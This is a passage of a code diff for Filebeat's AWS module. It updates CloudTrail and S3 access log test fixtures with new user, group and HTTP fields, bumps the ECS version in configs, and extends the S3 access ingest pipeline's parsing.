b/x-pack/filebeat/module/aws/cloudtrail/test/create-group-json.log-expected.json @@ -36,8 +36,13 @@ "creation" ], "fileset.name": "cloudtrail", + "group.id": "EXAMPLE_ID", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -80,8 +85,12 @@ "creation" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 903, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json index 41cca74d099d..f2ce56d3683e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-key-pair-json.log-expected.json @@ -32,6 +32,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "72.21.198.64", "source.as.number": 16509, diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json index e358d16bc725..66e126a2da2c 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-trail-json.log-expected.json @@ -41,6 +41,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json index 2fee7445e824..65b0db2d2939 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-user-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,8 @@ ], "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.id": "EXAMPLEUSERID", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.3.2 Python/2.7.5 Windows/7", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json index aa2b7a2bc631..5ab34b15c5fa 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/create-virtual-mfa-device-json.log-expected.json @@ -34,6 +34,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json index 3c062a8ef234..2639ed8a4905 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/deactivate-mfa-device-json.log-expected.json @@ -44,6 +44,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Alice", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json index 2ea8b42fa6c4..8146718df72b 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-access-key-json.log-expected.json @@ -34,6 +34,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -44,6 +45,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json index 687e46021948..d1c2ab6f9e79 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-group-json.log-expected.json @@ -30,8 +30,12 @@ "deletion" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -74,8 +78,12 @@ "deletion" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 747, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json index 8c3897af7957..d1f4415d4cdd 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-ssh-public-key-json.log-expected.json @@ -34,6 +34,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -44,6 +45,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json index 09ad2ddf9d41..58a7d7a36adb 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-trail-json.log-expected.json @@ -24,6 +24,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json index b97cdbab3dfe..ac0c0163b5da 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-user-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,7 @@ ], "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json index d770587f6484..ec713a1c41b7 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/delete-virtual-mfa-device-json.log-expected.json @@ -32,6 +32,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json index ae3605a03a0a..f89c1b5ab536 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/describe_configuration_recorders-json.log-expected.json @@ -25,6 +25,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "REDACTED" + ], "service.type": "aws", "source.address": "REDACTED", "tags": [ diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json index 1f9d3a519bbf..253bf3d45236 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/enable-mfa-device-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "console.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json index c4ce4c167be9..419a86799cc8 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/remove-user-from-group-json.log-expected.json @@ -31,9 +31,11 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "Admin", "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -44,6 +46,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json index 586c1ee9421d..5d7299ae4c21 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/start-logging-json.log-expected.json @@ -27,6 +27,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json index b3670ee5faca..266cded86f2e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/stop-logging-json.log-expected.json @@ -27,6 +27,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json index 0c517b2c688f..4b30eaed7ae3 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-access-key-json.log-expected.json @@ -35,6 +35,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -45,6 +46,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json index e08eea3d071d..edb7444604be 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-accout-password-policy-json.log-expected.json @@ -37,6 +37,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json index 09c00b8d57b9..95827327cec2 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-group-json.log-expected.json @@ -28,8 +28,12 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", @@ -74,8 +78,12 @@ "change" ], "fileset.name": "cloudtrail", + "group.name": "TEST-GROUP2", "input.type": "log", "log.offset": 683, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json index 174bae15aa17..6992dc1a9786 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-login-profile-json.log-expected.json @@ -33,6 +33,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -43,6 +44,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json index 204ae7e2e1e0..12efc4cf0711 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-ssh-public-key-json.log-expected.json @@ -35,6 +35,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -45,6 +46,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" @@ -85,6 +87,7 @@ "input.type": "log", "log.offset": 800, "related.user": [ + "Alice", "Bob" ], "service.type": "aws", @@ -95,6 +98,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json index 1531a7c1e5a3..1d00ae0c1718 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-trail-json.log-expected.json @@ -25,6 +25,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 0, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "205.251.233.182", "source.as.number": 16509, @@ -92,6 +95,9 @@ "fileset.name": "cloudtrail", "input.type": "log", "log.offset": 766, + "related.user": [ + "Alice" + ], "service.type": "aws", "source.address": "127.0.0.1", "source.ip": "127.0.0.1", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json index 08769b6dcca4..068c1db631a5 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/update-user-json.log-expected.json @@ -31,6 +31,7 @@ "input.type": "log", "log.offset": 0, "related.user": [ + "Alice", "Bob", "Robert" ], @@ -40,8 +41,10 @@ "tags": [ "forwarded" ], + "user.changes.name": "Robert", "user.id": "EX_PRINCIPAL_ID", "user.name": "Alice", + "user.target.name": "Bob", "user_agent.device.name": "Spider", "user_agent.name": "aws-cli", "user_agent.original": "aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46", diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json index 0464fe184a82..d81ec8fa25b7 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/upload-ssh-public-key-json.log-expected.json @@ -45,6 +45,7 @@ ], "user.id": "EXAMPLE_ID", "user.name": "Alice", + "user.target.name": "Alice", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "signin.amazonaws.com" diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml index 6339940d432f..8e04baa33954 100644 --- a/x-pack/filebeat/module/aws/cloudwatch/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudwatch/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/ec2/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/ec2/config/file.yml b/x-pack/filebeat/module/aws/ec2/config/file.yml index 6339940d432f..8e04baa33954 100644 --- a/x-pack/filebeat/module/aws/ec2/config/file.yml +++ b/x-pack/filebeat/module/aws/ec2/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/elb/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/elb/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/elb/config/file.yml b/x-pack/filebeat/module/aws/elb/config/file.yml index 402a1b25b125..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/aws/elb/config/file.yml +++ b/x-pack/filebeat/module/aws/elb/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml index db50bdc4362c..c156fac870ba 100644 --- a/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/s3access/config/aws-s3.yml @@ -52,4 +52,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/s3access/config/file.yml b/x-pack/filebeat/module/aws/s3access/config/file.yml index 402a1b25b125..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/aws/s3access/config/file.yml +++ b/x-pack/filebeat/module/aws/s3access/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml b/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml index dd8613a904ad..4dea7d027c6f 100644 --- a/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml +++ b/x-pack/filebeat/module/aws/s3access/ingest/pipeline.yml @@ -1,6 +1,12 @@ description: "Pipeline for s3 server access logs" processors: + - set: + field: event.category + value: web + - append: + field: event.type + value: access - set: field: event.ingested value: '{{_ingest.timestamp}}' @@ -24,6 +30,22 @@ processors: S3ID: "[a-zA-Z0-9\\/_\\.\\-%+=]+" S3VERSION: "[a-zA-Z0-9.]+" + - grok: + field: aws.s3access.request_uri + ignore_failure: true + patterns: + - '%{NOTSPACE:http.request.method} %{NOTSPACE:url.original} [hH][tT][tT][pP]/%{NOTSPACE:http.version}' + + # + # Best-effort parse of url.original in the form /path?query" + # + - grok: + field: url.original + ignore_failure: true + patterns: + - '^%{ABS_PATH:url.path}(?:\?%{DATA:url.query})?$' + pattern_definitions: + ABS_PATH: '/[^?]*' - append: if: "ctx?.aws?.s3access?.bucket_owner != null" field: related.user @@ -99,10 +121,25 @@ processors: field: event.outcome value: success - - set: - field: event.duration - value: "{{aws.s3access.total_time}}" - ignore_empty_value: true + - convert: + field: aws.s3access.bytes_sent + target_field: http.response.body.bytes + type: long + ignore_failure: true + + - convert: + field: aws.s3access.total_time + target_field: event.duration + type: long + ignore_failure: true + + - script: + lang: painless + if: ctx.event?.duration != null + params: + MS_TO_NS: 1000000 + source: >- + ctx.event.duration *= params.MS_TO_NS; - set: field: http.request.referrer @@ -137,13 +174,18 @@ processors: field: event.kind value: event + # + # Save original message into event.original + # + - rename: + field: "message" + target_field: "event.original" + # # Remove temporary fields # - remove: - field: - - message - - _temp_ + field: _temp_ ignore_missing: true on_failure: diff --git a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json index 187f7f335891..aa9d1bf6938a 100644 --- a/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/s3_server_access.log-expected.json @@ -23,12 +23,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.LOCATION", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "17", + "event.duration": 17000000, "event.id": "44EE8651683CB4DA", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:41 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 44EE8651683CB4DA REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 17 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -38,7 +43,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + "http.request.method": "GET", + "http.response.body.bytes": 142, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 0, "related.ip": [ @@ -54,6 +62,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?location&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -86,12 +97,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.LOCATION", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "3", + "event.duration": 3000000, "event.id": "E26222010BCC32B6", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -101,7 +117,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + "http.request.method": "GET", + "http.response.body.bytes": 142, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 715, "related.ip": [ @@ -117,6 +136,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?location&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -150,12 +172,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.BUCKET", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "2", + "event.duration": 2000000, "event.id": "4DD6D17D1C5C401C", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -165,7 +192,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + "http.request.method": "GET", + "http.response.body.bytes": 265, "http.response.status_code": 200, + "http.version": "1.1", "input.type": 